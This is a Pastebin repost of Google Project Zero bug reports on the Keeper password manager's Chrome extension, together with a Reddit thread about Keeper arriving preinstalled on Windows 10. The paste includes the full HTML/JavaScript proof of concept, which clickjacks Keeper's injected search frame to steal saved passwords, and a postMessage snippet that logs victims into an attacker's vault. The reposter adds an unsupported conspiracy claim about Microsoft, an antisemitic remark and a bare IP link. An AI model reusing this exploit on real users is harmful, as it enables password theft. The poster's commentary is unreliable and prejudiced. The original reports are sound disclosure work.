Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Crapware pre-packaged with Windows 10 allows complete and easy password theft
- A password manager called "keeper" is installed in Windows 10 by default. It allows easy password theft. Microsoft knew this months ago, and kept this vulnerability wide open in the latest update.
- The following was posted to bugs.chromium.org
- keeper: privileged ui injected into pages (again)
- I recently created a fresh Windows 10 VM with a pristine image from MSDN, and found that a password manager called "Keeper" is now installed by default. I'm not the only person who has noticed this:
- https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/
- I assume this is some bundling deal with Microsoft. I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages ( issue 917 ). Amazingly, they're doing the exact same thing again with this version. I think I'm being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works.
- Nevertheless, this is (again) a complete compromise of Keeper security, allowing any website to steal any password. Here is a working demo that steals your twitter password:
- https://lock.cmpxchg8b.com/keepertest.html
- Please consider adding regression tests before releasing an update for this issue, as I do not plan on creating new issues for every piece of UI I can dispatch events to, and attackers will certainly check them all.
- This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
- My comment: It could not be any more obvious that Microsoft allowed this intentionally in a way they could push the blame off on someone else. This will allow subversive political groups a way to:
- 1. Get countless false posts in the names of many people in whatever locations they feel are highly strategic politically.
- 2. Give them a doorway into every opponent's life, so they can destroy that opponent and the opponent will never knew what hit them. That opponent could be as benign as your grandma when it is made this easy for an attacker.
- 3. Steal whatever they want.
- This kind of security hole is a zionist's dream come true. They can destroy absolutely anyone with it. Not at all surprising it is Microsoft allowing it.
- http://82.221.129.208/.zo4.html
- This is an archived post. You won't be able to vote or comment.
- 10
- NewsKeeper Password Manager comes preinstalled now i.redd.it
- submitted 6 months ago by ToppestOfDogs
- • 20 comments
- • share
- • save
- •
- hide
- • report
- all 20 comments
- sorted by:
- best
- Want to add to the discussion?
- Post a comment!
- CREATE AN ACCOUNT
- [–]ToppestOfDogs[S] 7 points 6 months ago
- I just reinstalled Windows 10 today, and I was uninstalling all the bundled apps like usual, and I noticed that Keeper Password Manager is preinstalled now. I've never seen this come installed with Windows before.
- And this isn't a link to install it like some of the other apps, it's actually installed and opens.
- • permalink
- • embed
- • save
- [–]aaronfranke 2 points 6 months ago
- Which edition?
- • permalink
- • embed
- • save
- • parent
- [–]ToppestOfDogs[S] 5 points 6 months ago
- Pro
- • permalink
- • embed
- • save
- • parent
- [–]maspiers 2 points 6 months ago
- Had it happen on home too, reimaging a PC last week
- • permalink
- • embed
- • save
- • parent
- [–]4690 2 points 6 months ago
- Not OP, but I've had it happen in a VM when I installed 10 Pro on it.
- • permalink
- • embed
- • save
- • parent
- [–]vitorgrs 4 points 6 months ago
- CDM (Content Delivery Manager) does it. It will pre-install some apps based on "your taste".
- • permalink
- • embed
- • save
- • parent
- [–]MorallyDeplorable 23 points 6 months ago
- That's unsettling.
- • permalink
- • embed
- • save
- • parent
- [–]ToppestOfDogs[S] 7 points 6 months ago
- Weird. I've never installed any password stuff from the windows store
- • permalink
- • embed
- • save
- • parent
- [–]luxtabula 3 points 6 months ago
- I've been having computer problems recently and had to reset it. Keeper came preinstalled on the refresh. I highly doubt it was based on my tastes.
- • permalink
- • embed
- • save
- • parent
- [–]iSn0wElite 3 points 6 months ago
- I think this is true, because I reinstalled windows 10 pro today too and it didn't preinstall any password menager, I had some cooking apps instead 😂
- • permalink
- • embed
- • save
- • parent
- [–]vitorgrs 5 points 6 months ago
- Here it installs PowerBi and some "Enterprise" stuff lol
- • permalink
- • embed
- • save
- • parent
- [–]jantari 2 points 6 months ago
- Doubt it, it installed on a brand new laptop that never saw a Microsoft Account only one local admin
- • permalink
- • embed
- • save
- • parent
- [–]kylegordon 1 point 4 months ago
- A fresh laptop out the box here, wiped and 'reset with no data kept' or whatever it's called, and it the app was installed.
- I hadn't put in any email addresses, logged in to any websites, or anything. Only my name for the mandatory user account.
- It's not based on 'taste'
- • permalink
- • embed
- • save
- • parent
- [–]jbobisaboss 6 points 5 months ago
- Cntent Delivery Manager. It silently installs apps. You can disable this "feature" with a little registry editing:https://insidewindows.net/2016/08/24/how-to-stop-windows-10-1607-from-installing-unwanted-apps/
- • permalink
- • embed
- • save
- [–]PM_ME_LUCID_DREAMS 3 points 4 months ago
- A bit late, but having reinstalled a "clean" Windows 10 from scratch, this registry edit (SilentInstalledAppsEnabled) was one of the first things I did.
- After an "update", Keeper still appeared, alongside CandyCrush and other shit.
- The registry key itself was not changed by the "update", and I removed the crapware again and doesn't come back seemingly until the next "update".
- • permalink
- • embed
- • save
- • parent
- [–]rfarrell1978 1 point 4 months ago
- Thanks for this. Regedit is a part of computers that I was totally ignorant to.
- • permalink
- • embed
- • save
- • parent
- [–]Jordedude1234 1 point 1 month ago
- Thank you. You have helped a person who google searched it.
- • permalink
- • embed
- • save
- • parent
- [–]ACM1911 2 points 6 months ago
- I've uninstalled this thing 3 times now. Please go the fuck away Keeper.
- • permalink
- • embed
- • save
- [–]exxxidor 2 points 5 months ago
- Just got this installed today via the WindowsUpdateClient. Ugh.
- Not sure if this is controlled by the Content Delivery System or not. Hope so, as I'm turning that off.
- • permalink
- • embed
- • save
- [–]JamesWildDev 1 point 6 months ago
- I had this too! So weird.
- • permalink
- • embed
- • save
- https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/?st=jbdxsf69&sh=9606f3e9
- Keeper: Trusted UI is injected into untrusted webpage
- Project Member Reported by taviso@google.com, Aug 26 2016
- Back to list
- I took a quick look at Keeper, a password manager for Windows, Mac, Linux. The extension injects it's trusted UI into untrusted webpages with a content script. I don't think that's safe to do.
- I'm not a web developer, but you can see what I mean in the attached example. I only tested it in Chrome.
- A more polished example is obviously possible.
- The example does this:
- 1. Click the little keeper icon you add to input boxes, that's just: document.getElementById('keeper-icon-2').click();
- 2. Click the search button in the popup that appears.
- 3. Search for "Google", e.g. document.getElementById('keeper-search-box-input').value="Google"
- 4. wait for the search results to appear, then hide the iframe.
- 5. When the user is about to click, display it and then wait for the password to be inserted.
- 6. Now the page can read the password.
- This bug is subject to a 90 day disclosure deadline. If 90 days elapse
- without a broadly available patch, then the bug report will automatically
- become visible to the public.
- Comment 1 Deleted
- Project Member Comment 2 by taviso@google.com, Aug 26 2016
- I tried to make the example more reliable.
- keeper.html
- 5.0 KB View Download
- Comment 3 Deleted
- Project Member Comment 4 by taviso@google.com, Aug 26 2016
- Keeper sent me an updated build that removes the search feature I was using. I suppose that solves the immediate problem. I noticed that the way messages were passed didn't seem safe though.
- For example, it's possible to log someone into your account and then when they save their passwords, they're effectively giving them to you.
- For example a website can do this:
- x = window.open("https://keepersecurity.com/vault/");
- x.postMessage({client: "ext", cmd: "logout"},"*")
- x.postMessage({client: "ext", cmd: "login", login: "attacker@account.com", password: "attackerspassword"}, "*")
- And now whenever you save a password, you're unknowingly saving it to the attackers. I asked why there isn't a check for message.origin == "chrome-extension://...", etc.
- Project Member Comment 5 by taviso@google.com, Aug 27 2016
- I uploaded the example here for testing.
- https://lock.cmpxchg8b.com/keeper.html
- Project Member Comment 6 by taviso@google.com, Aug 27 2016
- Labels: -Restrict-View-Commit
- Summary: Keeper: Trusted UI is injected into untrusted webpage (was: Keeper: trusted UI is injected into untrusted webpage)
- It looks like the 10.1.3 update is live on the chrome web store, removing view restriction.
- Comment 7 by cr...@keepersecurity.com, Aug 28 2016
- This issue has been fixed with Keeper Browser Extension v10.1.3 which is live on Chrome web store. Below is the blog post related to the issue:
- https://blog.keepersecurity.com/2016/08/28/security-update-for-keeper-browser-extension/
- Project Member Comment 8 by taviso@google.com, Nov 1 2016
- Status: Fixed
- https://bugs.chromium.org/p/project-zero/issues/detail?id=917
- keeper: privileged ui injected into pages (again)
- Project Member Reported by taviso@google.com, Dec 14 (5 days ago)
- Back to list
- I recently created a fresh Windows 10 VM with a pristine image from MSDN, and found that a password manager called "Keeper" is now installed by default. I'm not the only person who has noticed this:
- https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/
- I assume this is some bundling deal with Microsoft. I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages ( issue 917 ). I checked and, they're doing the same thing again with this version. I think I'm being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works.
- Nevertheless, this is a complete compromise of Keeper security, allowing any website to steal any password. Here is a working demo that steals your twitter password:
- https://lock.cmpxchg8b.com/keepertest.html
- Please consider adding regression tests before releasing an update for this issue.
- This bug is subject to a 90 day disclosure deadline. After 90 days elapse
- or a patch has been made broadly available, the bug report will become
- visible to the public.
- Windows 7-2017-12-13-16-33-37.png
- 43.2 KB View Download
- Project Member Comment 1 by taviso@google.com, Dec 14 (5 days ago)
- Description: Show this description
- Project Member Comment 2 by taviso@google.com, Dec 14 (4 days ago)
- Description: Show this description
- Project Member Comment 3 by taviso@google.com, Dec 14 (4 days ago)
- Keeper replied "we should have a fix built tomorrow and I will let you know when it has been published".
- We discussed possible fixes, it sounds like they're just going to disable the feature for now.
- Project Member Comment 4 by taviso@google.com, Dec 15 (4 days ago)
- Status: Fixed
- Keeper have told me they've released a fixed version.
- Project Member Comment 5 by taviso@google.com, Dec 15 (4 days ago)
- Labels: -Restrict-View-Commit
- Comment 6 by cr...@keepersecurity.com, Dec 15 (3 days ago)
- Version 11.4.4 was released 24 hours after the report. Here's our blog post:
- https://blog.keepersecurity.com/2017/12/15/update-for-keeper-browser-extension-v11-4/
- Project Member Comment 7 by taviso@google.com, Yesterday (43 hours ago)
- Keeper sent me a mail requesting multiple changes to this report, the crux of their concern is that they believe the Keeper browser extension is a separate product to their Keeper desktop application, and believe this report conflates the two products.
- The keeper browser extension is installed as part of the default setup flow for the Keeper application, the relevant prompt can be seen in the attached screenshot. Unless a user clicks "Skip" in this dialog, they would be affected by this vulnerability. I stand by my original assessment of this issue, and consider clicking "Skip" here a non-default configuration.
- A user must have completed the setup flow to be vulnerable - the existence of the keeper icon in the start menu alone is not sufficient. If a user has clicked the icon and started using Keeper in the default configuration, they would be vulnerable.
- keeper.jpg
- 17.5 KB View Download
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1481&desc=3
- This is the *second* time keeper have been injecting privileged search elements into pages. So yet again, here is how to steal the password for any website from a Keeper user.
- This page just clicks the search button, types in "Twitter" and then adds this page to the list of logon URLs.
- The content below could be invisible, it's low opacity just to demonstrate the attack.
- https://lock.cmpxchg8b.com/keepertest.html
- Issue 917 attachment: keeper.html (5.0 KB)
- <html>
- <head>
- <script>
- const kSearchTerm = "Twitter"; // What password to try to steal.
- const kPollTime = 1000; // How often to check if the Keeper UI is ready.
- var timer;
- var frame;
- // Interact with the UI elements Keeper adds to the page to bring up the search
- // dialog.
- function interact()
- {
- var icon = document.getElementById('keeper-icon-2');
- var search = document.getElementsByClassName("ksec-icon-search")[0];
- var input = document.getElementById('keeper-search-box-input');
- var w = document.getElementById('keeper-injectWindow');
- var create = document.getElementById('keeper-submitYesBtn');
- var log = document.getElementsByClassName('keepersecurity_loginField')[0];
- var pw = document.getElementsByClassName('keepersecurity_tx')[0];
- var save = document.getElementById('save-and-fill-btn');
- // Click the little key icon added to input boxes.
- if (icon)
- icon.click();
- // Sometimes a dialog prompts before the popup is shown, dismiss it.
- if (create && create.offsetParent) {
- create.click();
- return;
- }
- // If it's prompting for a password, fill it in and then reload.
- if (pw && save && pw.offsetParent) {
- pw.value = "__ignore";
- save.click();
- setTimeout("document.location.reload()", kPollTime);
- return;
- }
- // Click the search icon on the top of the popup.
- if (search)
- search.click();
- // Hide the elements created by Keeper.
- if (w)
- w.style.display = "none";
- // Enter the search term "Google", which should add an iframe with results.
- if (input) {
- clearInterval(timer);
- input.value = kSearchTerm;
- input.dispatchEvent(new CustomEvent("keyup", {}))
- timer = setInterval(stealframe, kPollTime);
- }
- }
- function stealframe()
- {
- frame = document.getElementById('keeper-search-result-frame-results');
- target = document.getElementById('target');
- if (frame) {
- clearInterval(timer);
- // We can't access the results, but we can move the iframe around, as
- // soon as it appears, remove it.
- frame.parentElement.removeChild(frame);
- target.style.display = "block";
- // Move the iframe somewhere predictable, but make it transparent so
- // the user doesn't know they're clicking it.
- frame.style.position = "absolute";
- frame.style.width = "256px";
- frame.style.height = "64px";
- frame.style.overflowX = "hidden";
- frame.style.overflowY = "hidden";
- frame.style.overflow = "hidden";
- frame.style.opacity = "0.01";
- //frame.style.top = "-30px"; // First button
- frame.style.top = "-82px"; // Second button
- frame.style.left = "0px";
- target.appendChild(frame);
- }
- }
- </script>
- <style>
- body {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 16px;
- }
- /* Hide all Keeper UI */
- kwdiv {
- opacity: 0.01;
- }
- #target {
- display: none;
- }
- #test {
- opacity: 0.01;
- }
- #target {
- position: relative;
- font-weight: bold;
- }
- #filltitle {
- font-size: 14px;
- padding: 6px 0px;
- position: absolute;
- top: 7px;
- left: 7px;
- }
- /* This is the cssText from the real button */
- #fillbutton {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 14px;
- line-height: 20px;
- color: rgb(0, 0, 238);
- width: 44px;
- padding: 6px 0px;
- height: 20px;
- text-align: center;
- font-weight: bold;
- border: 1px hidden;
- border-radius: 3px;
- cursor: pointer;
- float: right;
- margin-right: 16px;
- position: absolute;
- top: 7px;
- left: 185px;
- text-decoration: underline;
- }
- </style>
- </head>
- <body onload="timer = setInterval(interact, kPollTime)">
- <p>
- This demonstration attempts to automate interacting with the Keeper Chrome
- extension so that the page can steal passwords.
- </p>
- <p>
- This is done by:
- <ul>
- <li>Creating a hidden form that keeper adds a button (<img src="chrome-extension://bfogiafebfohielmmehodmfbbebbbpei/images/16x16gold.png">) to.</li>
- <li>Finding that button, then clicking it with JavaScript.</li>
- <li>Keeper injects a search dialog into the page, which I enter "Twitter" into.</li>
- <li>Waiting for Keeper to draw an iframe with the search results.</li>
- <li>Moving the frame around so you don't know what you're clicking on.</li>
- <li>If you do click it, the password is sent to the untrusted page.</li>
- </ul>
- </p>
- <p>
- The result is that if you click anywhere on a page, you could be sending a
- password for another site.
- </p>
- <div id=target>
- <div id=filltitle>Try clicking this link:</div>
- <div id=fillbutton>Here</div>
- </div>
- <form id=test>
- <input type=text name=username>
- <input type=password name=password onchange="(value != '__ignore') && alert(value)">
- </form>
- </body>
- </html>
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=248504
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement